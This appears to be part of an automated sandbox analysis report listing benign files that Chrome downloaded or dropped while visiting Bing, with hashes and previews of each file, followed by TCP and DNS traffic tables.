                                                                                                    Preview:var SerpKeyboardNavigation;(function(){function c(){h=_d.activeElement;n=null;u=null;e=!1;t=-1;nt();u=_w.NavSelector&&NavSelector(!1)}function p(){v();n=null}function w(i){var e,h,o;i&&(e=_d.activeElement,h=s&&e&&e.className&&e.className.indexOf("feedback-binded")!==-1,i.keyCode==r.Tab&&s&&(f("TOP"),s=!1),u&&e&&e.className!=="b_searchbox"&&!h&&(i.keyCode==r.Enter?(n=null,f(t==-1?"EN":"EE",t)):b(i)&&(o=k(i.keyCode),o!==-1&&o!==t&&(tt(o),sj_pd(i)))))}function f(n,t){sj_log("CI.SerpKeyboardNav",n,t?t.toString():"")}function b(t){var i,r=(i=_d.querySelector("#b_sydConvCont cib-serp"))===null||i===void 0?void 0:i.getAttribute("mode");return n||h==_d.activeElement?t.altKey||t.ctrlKey?!1:r&&["conversation","notebook"].includes(r)?!1:!0:!1}function k(n){if(n===r.Tab)return d();if(n===r.Down||n===r.Up){var t=document.activeElement;return t&&(t.tagName.toLowerCase()==="select"||t.tagName.toLowerCase()==="input")?-1:g(n===r.Down)}return-1}function d(){var i=-1;return n?(v(),e=!0,t=-1,f("TO")):(i=
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (429), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):429
                                                                                                    Entropy (8bit):5.098203134109495
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:GtAJv9xWHXWpwYMEX3IR6lVDZWhHD6GkPsHKHOZzu2wBRHJhNURtAJ4ZQetAJD:GeyWeYMEnsUVoHoigkhwBRphNQR+e+
                                                                                                    MD5:0794C2FFC9AAF238496BF687A9C68799
                                                                                                    SHA1:7938BE485611F9D417E84B8C0A74BD3C589E052F
                                                                                                    SHA-256:805AAA9634639B2EAA912E117219727DFA6E92A63B8B92569C336A9CCDE52DEE
                                                                                                    SHA-512:FEFBFBD39B9B86D8975D8FAAB62B50515488E9BF1E21AD72FED9FA93614E10ADAFC99DA77349EAD2501B89D422D766ADC313B6024BCB9B331AB83A7B99BB135F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/eTi-SFYR-dQX6EuMCnS9PFieBS8.js
                                                                                                    Preview:var SBIImgsHelper;(function(){function i(){typeof SbiUtil!="undefined"&&(SbiUtil===null||SbiUtil===void 0?void 0:SbiUtil.oncop(SbiUtil.rt,r))}function r(i){var r=i.target||i.srcElement,u;r&&r.tagName==="IMG"&&r.classList.contains(n)&&r.src&&(u=r.getAttribute(t),u&&sj_evt&&sj_evt.fire&&sj_evt.fire("sbi_searchimgurl",SbiUtil.gimg(r),u,null,SbiUtil.gaps(r)))}var n="sbiable",t="data-sbiid";i()})(SBIImgsHelper||(SBIImgsHelper={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15406
                                                                                                    Entropy (8bit):4.967552114438246
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:2xApRWtvbsjgIYYQlV47U/1z8QsCj99/R1qa/PRZs6M75m4vU6GCi28urvZQYH3:FRIwcVeq8wjjLENG72tl
                                                                                                    MD5:31D62B976C16DB52CBF0D5631BCDE62C
                                                                                                    SHA1:18F2D0B838D766B642E787E222075DDFF5285662
                                                                                                    SHA-256:04663FB0B01FC27B402519F0B000DB2B98EF3754C8C99C21E304262D2353AB62
                                                                                                    SHA-512:104E20B3977B6ADAF6847D62199656A4E93CA3478D78335DBA65B807C4375E8AA3FB41BD12B3EA0CF11C689C21BC1486DA063415372F4AD090D95DC2517880E1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... ....................................................o..o.z.................................................v.........{...u.v.m.................................O.................y...r...l..g.O.................x...n!..c...a/..............w...o...h...c..._...Zx..........z9..v-..q!..h...^...b:..~.......t...j...c...^...Z}..Wz..........zH..zE..y<..u...o!..f..W.a.|.a.n..c...\...Xy..Uv..Tq..........zS..{T..{T..{Q..yG..v...........d...Y{.Tu..Po..Kh..t\..........{`..|b..|e..|i..|n..................Mk..If..C]..lS...P..........{l..|p..|u..}}..}.z.................C^z.ST..O...O...O..........}x..}|..}...}...mw..I7...........N..L...M...M...N...N..........}...}...}...~...ag..\9..xC..G..I..K...K...L...M...N..........}...}...~...~...ak..^:..{C..F..H..I..K..K...L...M..........x...}...~.......bl.._;..|C..F...G..I..J..K..K...K..................~.O....gt..a;..}C..F..G..H..I..JO......................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):209
                                                                                                    Entropy (8bit):6.257245349235395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPl3xWrE9/gnbBE1d7snLQNylzkIgDhqo/1ir1216rTmVN80S+st2up:6v/lhPKwCnFGgQNyld+/ou6Hp0NsTp
                                                                                                    MD5:7D4555B1487EC50930C7567B2690BF10
                                                                                                    SHA1:544C4B9A47D0D12FD38FDC07900D32D31C0F600F
                                                                                                    SHA-256:50BBDF35A7DE6804B4E50971D7E3656D6C8100E4A03CF935F841D0AFD47D8371
                                                                                                    SHA-512:F293E1F06C7244C2FD080A65C3A32D134A6AF23E9148B8A391E242D8EA36297FFE8C500903B9B65A6E450EB1731ECF28CBE0A67F6E246938501BEBDDA5A6B177
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J....sIDATXG....0...7...#.}$.....N..bu...,.....>>.mm....8....K....@....NW..n......cL..7....0....\...v.k.. ......`x....GT..{....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):298
                                                                                                    Entropy (8bit):6.792615229750693
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPKwCnFUJwf8RvG0dG9DsCJIWo+aAv+t8FvWwtbp:6v/7iwkFUJMyeHh1IX8S8Fue1
                                                                                                    MD5:0F21D94CE833C0F861617694D028CF0E
                                                                                                    SHA1:EC2639715E2031778BF874660461637EBD7BA368
                                                                                                    SHA-256:D1069BF1EEDFACE550CEC82F5C3954BCA0EA622D0BC792B173F2B1AB3D5EBFD6
                                                                                                    SHA-512:717BCF80BC5F2284EF27F97DED1E2228DCA5E7942B638EDAA7529E18F058D392277B990B182230272F393A349383660BF003E999D2C5DA3DCD8A7589C1D9E8D9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=ODLS.61ccb3ad-8c62-401e-b4f9-4450313deffd&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG..1..0......:...I...`...E."....V...(fiK .Wo.,.o../?.....'O.v>...z..($..@..........[&....NS..C..5.....@.X..fq...r.Q.z"Z7P..Yq...8[...f8Y...\..1.oFWh.......6(..=^.p=.........j.o.....$...@......./X.D.M.....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 80x80, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):3616
                                                                                                    Entropy (8bit):7.872687999074232
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:9xFuERABNMcKElw0gPsKjANckY2vRH59Hs0O038L7kiqoUkonu4xA1yZM74DH:TME77Z0NLPvN5rANqoUc/yZ04r
                                                                                                    MD5:F2E57B8353E0EBE5E4D8D6FE0C86F971
                                                                                                    SHA1:C6B3BE1653EAB63214E0791D8696C8866D29426B
                                                                                                    SHA-256:F0667DBC0828D6FA3FC276376D8F0D86E36DE6D5CD73A6635A60BC03916ED020
                                                                                                    SHA-512:07B7EC067AAB0FA904305B810729FAE9E25307898921EFA9A1C2447CA28A1702304F590A5A6BA7D1CC547AB8727D89BAB9386C669C264C5E6C8666ED1AB92498
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/th?id=OVFT.5pKGdUKG3YSuFRwWFjxMYi&pid=News&w=80&h=80&c=14&rs=2&qlt=90
                                                                                                    Preview:......JFIF.....`.`.....C....................................................................C.......................................................................P.P.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...i_..X..#..0...F?Gu..X][J...W.7Q.Mkp.e....H.;..._qq.+.?.p.......S...U.YNk_.RQ..G.|G.ap.aR.i.m....n TT...U{.w.6:..q.."...'+......9.8...-.....n.O..A...#=..O.$/..E.B.s...>n....8.p..g..5...e&.../...;..x....).6.(.i..&...._i.Ch.$XG<)..z..1\H..".|...J.7.H....r..~....?..H.eS...`..|.|.>.$$....1.1#..J<Y.S.....g(......N.....&q..e.....I>,.]7lf]....Z.y.X(U'.2..+.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1225), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1225
                                                                                                    Entropy (8bit):5.141811507851455
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:uXpw1mF48CYXbScfnkRXjRVaOvNm8XHV8FCeOOF1x3AE:ug8bbSukRtFVh1pC7QE
                                                                                                    MD5:32A234383EA9C16D420FC8C5B5F97C15
                                                                                                    SHA1:EB38A1729DB3951F83C691C5F3EA6D6B280BC31C
                                                                                                    SHA-256:52B60618463CD558429AB7BE5E76ECF619883437694C2A4B83A3D26B345C2785
                                                                                                    SHA-512:86190B0A611DDFB543B6A0A3F26501876334EC6C4A862624AA3D5716426B1D24741CE679A7BA32BC220E2AB797DF9402A97A92BFC12C6F80986B1FECCF9A76AF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var RewardsIdleTabTracker;(function(n){var i,r=0,e=!1,u=!1,f;n.init=function(n){var f;if(!n||Object.keys(n).length===0){Log.Log("Info","RewardsIdleTabTracker","emptyJsonDataProvided",!1);return}if(r=parseInt(n.TimeoutMilliseconds),!r){Log.Log("Info","RewardsIdleTabTracker","timeoutMillisecondsMissing",!1);return}s();sj_be(_d,"mousemove",t);sj_be(_d,"click",t);sj_be(_d,"keypress",t);sj_be(_d,"scroll",t);sj_be(_d,"touchstart",t);var e=n.ShouldLogActivity===!0,i=parseInt(n.LogInterval),u=parseInt(n.MaxLogTimeoutMilliseconds);e&&i&&u&&(f=setInterval(h,i),setTimeout(function(){return clearInterval(f)},u))};var t=function(){clearTimeout(i);f=new Date;u||(i=setTimeout(o,r))},o=function(){u||(sj_evt.fire("idletabactivated"),u=!0,Log.Log("Info","RewardsIdleTabTracker","idleTabEventFired",!1),clearTimeout(i),sj_ue(_d,"mousemove",t),sj_ue(_d,"click",t),sj_ue(_d,"keypress",t),sj_ue(_d,"scroll",t),sj_ue(_d,"touchstart",t))},s=function(){e||(Log.Log("Info","RewardsIdleTabTracker","idleTabTrackerInit
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 286 x 41, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7115
                                                                                                    Entropy (8bit):7.963812060299321
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ESBW7OKnwRKKrPq0lxbF4vMU7YzO1gR3C2Wl2:DY7PSrLprUEF3CH2
                                                                                                    MD5:747D2C674F731EDFD2779D83C8532E24
                                                                                                    SHA1:C40A635C160D4CA763D8C86F560CB937A8E1090B
                                                                                                    SHA-256:CA13C3E1EC9B3484F3E6AF002F127C03DE8E5171E76D37A5749A3CD75D098B05
                                                                                                    SHA-512:ED821EAB2956895A140C55AE7F79668F8DBB55D54408251ADED0C57200D8AD04E40DFF95EEBA79D6D149FDF82FE77F21EEEBB235EE7BC12C84A6FF0DD3CB6691
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR.......).......Fw....pHYs.................sRGB.........gAMA......a....`IDATx.........G.l.$...h..D..(.J*m..HZP.....%YS.d-Q....Fv!.`..y.s.}.;wf.sg.s?..y..=...|..<.s.M.d..3...{.......sgIcL.......t..>../Y.d..ko.(..g.I.B.J....={Z......H...&o...-.X....;>s_Xr.../..pL.5j...&L.%.IJJ.8r..x....^.4h0.p..W.t.M;".....Uj.....**[.y.fQE&q.>(. .r..7'.Y.G.&M....:thO.6$#^..;..\|$.b....~.i.F...V../Y[..(`Z.l.4x..[....(....}..3$.8.....*.>b...=..F.[.u..5.6l....Cbb...4(Ae..N.:....._..a.r.E5.......(....{.W_}%...\.re...*. ..5k.Z.R.....?;.....Byx..Pa).n.........Q....G..{.....y.H6.`...s<....t.I.-.../g.y.\x.r.i.Y"....>....]Z2..n.M.V.*Y.K..D...J.#:...]t.....3.|..F.....9.cR...C."ER....+.~..G.;.<+.~P..\...G:..x..q.....o.bfp.UW.....~Xz..)D.*V.(.....}...&...[.:.,..4.$.^{....W\!......n..|..........7o../..9.h.G.....c...2e.-..&.+s..e*).'O......E.1....S..:+V....I.:u.{....~.W_}U>..C...'.h..q.<.....~..g9.O..h.1c...n.....h....f..N{...mq.v..gXk.?..Y.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:38:22], progressive, precision 8, 160x160, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5387
                                                                                                    Entropy (8bit):7.799957991588148
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:sQ+bfdSpU7SG7bVFwZ1w2f7yXMAZpqdiCRf6LtoIJ7g0WRiKQS+FhIeEIboU3cq:sRdSpU7vbVFwZ11jIIO6M7JqoIZuz3cq
                                                                                                    MD5:69D162774F894FF8B920330E376B7A62
                                                                                                    SHA1:F79CF9C0CCB851C7DB4924A54B0EFCD2F4398CA0
                                                                                                    SHA-256:C9FAA34663FE19EB4D8C007BF00AD7C4BC993F70C9FC42A04801ECCDD59008F7
                                                                                                    SHA-512:9D0E7FA4AC408D9D7D86186E05258BDB615B04AE8EC0DF813C3307A646EC4F87AABA1FCD77914AEA1FFE3607B87BBCA2DCC5D18C076D8AECDEA1496910AEC87D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:38:22....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.......................................................................................S&....1...\.g).l.....^S......^,I..c.7,..YX(."..>wiT.y.:^8........R*.-)s..>.+@..c..V.[Af...T.........3........B.|.~...A..|..r.......(qC..m~..nb...r.LIU.i3.K..........y.]5..\W;b.:/F...v.OW.R^...y^}4._...I4.t....l......,.$.C.....6..IS..E...../..J...5...%....Z.eK.u....j.........*x.{..t.!....@,...}..W...X8.S.........X.Z...-.w..(.8...z..EC..\....8.m5...z....Y.!\...!@.<:b].-.i}.....?..%...=gE.VM..\.2CJ..kK.d...o.!..v...M.e..4,...l...Y0...V.[.g..r.....h.....[-..-.....J....9kA..L...#.!"."kO.;...R.2...)Mr...X8....G.;A..".!az..Ud.Ie......+..........................!34 "12..$0ABCD........
                                                                                                    No static file info
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 23, 2024 18:43:34.549180031 CET49166443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:43:34.549227953 CET44349166172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:43:34.549293041 CET49166443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:43:34.549493074 CET49166443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:43:34.549510002 CET44349166172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:43:36.256988049 CET44349166172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:43:36.293245077 CET49166443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:43:36.293261051 CET44349166172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:43:36.294342995 CET44349166172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:43:36.294425964 CET49166443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:43:36.308160067 CET49166443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:43:36.308235884 CET44349166172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:43:36.515908957 CET49166443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:43:36.515933037 CET44349166172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:43:36.715920925 CET49166443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:43:37.173691034 CET49167443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:37.173736095 CET44349167172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:37.173810005 CET49167443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:37.191032887 CET49168443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:37.191068888 CET44349168172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:37.191116095 CET49168443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:37.213179111 CET49167443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:37.213238955 CET44349167172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:37.216048002 CET49168443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:37.216064930 CET44349168172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:38.440545082 CET44349167172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:38.440802097 CET49167443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:38.440855980 CET44349167172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:38.442121029 CET44349167172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:38.442212105 CET49167443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:38.443201065 CET49167443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:38.443273067 CET44349168172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:38.443293095 CET44349167172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:38.443483114 CET49168443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:38.443516970 CET44349168172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:38.443630934 CET49167443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:38.443660021 CET44349167172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:38.444967031 CET44349168172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:38.445027113 CET49168443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:38.445821047 CET49168443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:38.445905924 CET44349168172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:38.636044979 CET49167443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:38.651350021 CET44349168172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:38.651412964 CET49168443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:39.128779888 CET44349167172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:39.128981113 CET44349167172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:39.129162073 CET44349167172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:39.129300117 CET49167443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:39.130621910 CET49167443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:39.130645990 CET44349167172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:39.290618896 CET49169443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:39.290682077 CET4434916935.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:39.290971994 CET49169443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:39.290971994 CET49169443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:39.291012049 CET4434916935.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:40.523840904 CET4434916935.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:40.524249077 CET49169443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:40.524311066 CET4434916935.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:40.526071072 CET4434916935.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:40.526158094 CET49169443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:40.527676105 CET49169443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:40.527781963 CET4434916935.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:40.527827024 CET49169443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:40.571347952 CET4434916935.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:40.728168964 CET49169443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:40.728198051 CET4434916935.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:40.928189039 CET49169443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:40.980557919 CET4434916935.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:40.980797052 CET4434916935.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:40.980906010 CET49169443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:40.981143951 CET49169443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:40.981187105 CET4434916935.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:40.981666088 CET49172443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:40.981709003 CET4434917235.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:40.981765985 CET49172443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:40.982027054 CET49172443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:40.982038975 CET4434917235.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:42.262639999 CET4434917235.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:42.262969017 CET49172443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:42.262994051 CET4434917235.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:42.264359951 CET4434917235.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:42.264847040 CET49172443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:42.264993906 CET49172443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:42.264998913 CET4434917235.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:42.265017986 CET4434917235.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:42.465255976 CET49172443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:42.723707914 CET4434917235.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:42.723921061 CET4434917235.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:42.723984003 CET49172443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:42.724030972 CET49172443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:42.724045038 CET4434917235.190.80.1192.168.2.22
                                                                                                    Dec 23, 2024 18:43:42.724054098 CET49172443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:42.724122047 CET49172443192.168.2.2235.190.80.1
                                                                                                    Dec 23, 2024 18:43:45.958612919 CET44349166172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:43:45.958712101 CET44349166172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:43:45.958941936 CET49166443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:43:45.969893932 CET49166443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:43:45.969912052 CET44349166172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:43:53.233254910 CET44349168172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:53.233483076 CET44349168172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:43:53.233787060 CET49168443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:53.285569906 CET49168443192.168.2.22172.67.210.5
                                                                                                    Dec 23, 2024 18:43:53.285584927 CET44349168172.67.210.5192.168.2.22
                                                                                                    Dec 23, 2024 18:44:34.474261999 CET49517443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:44:34.474289894 CET44349517172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:44:34.474416018 CET49517443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:44:34.475828886 CET49517443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:44:34.475842953 CET44349517172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:44:36.167154074 CET44349517172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:44:36.167473078 CET49517443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:44:36.167496920 CET44349517172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:44:36.167952061 CET44349517172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:44:36.168570995 CET49517443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:44:36.168654919 CET44349517172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:44:36.373023033 CET49517443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:44:45.876771927 CET44349517172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:44:45.876838923 CET44349517172.217.17.36192.168.2.22
                                                                                                    Dec 23, 2024 18:44:45.876908064 CET49517443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:44:45.884356976 CET49517443192.168.2.22172.217.17.36
                                                                                                    Dec 23, 2024 18:44:45.884371996 CET44349517172.217.17.36192.168.2.22
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 23, 2024 18:43:30.193418980 CET53548218.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:30.403296947 CET53527818.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:30.434647083 CET53655108.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:33.259365082 CET53581058.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:34.422068119 CET5426153192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:34.422216892 CET6050753192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:34.548161983 CET53605078.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:34.548214912 CET53542618.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:36.475487947 CET4960853192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:36.530586958 CET6148653192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:36.845819950 CET53496088.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:36.896605968 CET53614868.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:39.158781052 CET6146753192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:39.162616014 CET6161853192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:39.281260014 CET53614678.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:39.285655975 CET53616188.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:50.168606043 CET53530608.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:55.251070023 CET6159853192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:55.251246929 CET5875453192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:56.970980883 CET53546158.8.8.8192.168.2.22
                                                                                                    Dec 23, 2024 18:43:57.605345011 CET6154953192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:57.608231068 CET5799853192.168.2.228.8.8.8
                                                                                                    Dec 23, 2024 18:43:57.739691973 CET5138453192.168.2.228.8.8.8
